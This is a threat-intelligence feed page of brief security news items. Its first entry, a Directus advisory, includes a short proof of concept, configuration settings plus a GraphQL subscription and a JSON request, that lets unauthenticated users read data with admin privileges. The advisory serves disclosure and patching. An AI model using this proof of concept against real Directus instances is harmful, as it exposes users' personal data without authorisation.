Threat and Vulnerability Intelligence Database
Example Searches:
CVE
Threat Actors
Countries
Vendors
Severity
Known Exploited
|
Description: Summary
When setting WEBSOCKETS_GRAPHQL_AUTH or WEBSOCKETS_REST_AUTH to "public", an unauthenticated user is able to do any of the supported operations (CRUD, subscriptions) with full admin privileges.
Details
Accountability for unauthenticated WebSocket requests is set to null, which used to be "public permissions" until the Permissions Policy update which now defaults that to system/admin level access. So instead of null we need to make use of createDefaultAccountability() to ensure public permissions are used for unauthenticated users.
PoC
Start directus with
WEBSOCKETS_ENABLED=true
WEBSOCKETS_GRAPHQL_AUTH=public
WEBSOCKETS_REST_AUTH=public
Subscribe using GQL or REST or do any CRUD operation on a user created collection (system tables are not reachable with crud)
subscription {
directus_users_mutated {
key
event
data {
id
email
first_name
last_name
password
}
}
}
or
{
"type": "items",
"action": "read",
"collection": "your_collection_name"
}
3a. Open up the data studio as any user. Observe how the subscriber gets notified on each page navigation (because the users last_page gets updated, the password fields is properly redacted here)
3b. Observe receiving all available items from the your_collection_name collection.
Impact
This impacts any Directus instance that has either WEBSOCKETS_GRAPHQL_AUTH or WEBSOCKETS_REST_AUTH set to public allowing unauthenticat...
December 9th, 2024 (5 months ago)
|
|
|
Description: Radiant Capital now says that North Korean threat actors are behind the $50 million cryptocurrency heist that occurred after hackers breached its systems in an October 16 cyberattack. [...]
December 9th, 2024 (5 months ago)
|
|
|
Description: Researchers demonstrate a proof-of-concept cyberattack vector that gets around remote, on-premises, and local versions of browser isolation security technology to send malicious communications from an attacker-controlled server.
December 9th, 2024 (5 months ago)
|
|
|
Description: Microsoft now blocks the Windows 11 24H2 update on computers with outdated Google Workspace Sync installs because they're causing Outlook launch issues. [...]
December 9th, 2024 (5 months ago)
|
|
|
Description: More than 4% of US attempted e-commerce transactions between Thanksgiving and Cyber Monday suspected to be fraudulent.
December 9th, 2024 (5 months ago)
|
|
|
Description: The threat actors linked to the Black Basta ransomware have been observed switching up their social engineering tactics, distributing a different set of payloads such as Zbot and DarkGate since early October 2024.
"Users within the target environment will be email bombed by the threat actor, which is often achieved by signing up the user's email to numerous mailing lists simultaneously," Rapid7
December 9th, 2024 (5 months ago)
|
|
|
Description: Eight members of an international cybercrime network that stole millions of Euros from victims and set up Airbnb fraud centers were arrested in Belgium and the Netherlands. [...]
December 9th, 2024 (5 months ago)
|
|
|
Description: Electrica Group, a key player in the Romanian electricity distribution and supply market, is investigating a ransomware attack that was still "in progress" earlier today. [...]
December 9th, 2024 (5 months ago)
|
|
|
Description: We can anticipate a growing number of emerging vulnerabilities in the near future, emphasizing the need for an effective prioritization strategy.
December 9th, 2024 (5 months ago)
|
|
|
Description: In 2024, the lesbian dating website ladies.com suffered a data breach. Attributed to an exposed Firebase database, the breach included extensive personal information on 119k users of the service including email addresses, photos, sexual orientation, genders, dates of birth and precise latitude and longitude, among other personal attributes. The website was shut down in mid-2024 and the breach later acknowledged by the site operator in December, along with a breach of the "Senior Dating" website run by the same organisation.
December 9th, 2024 (5 months ago)
|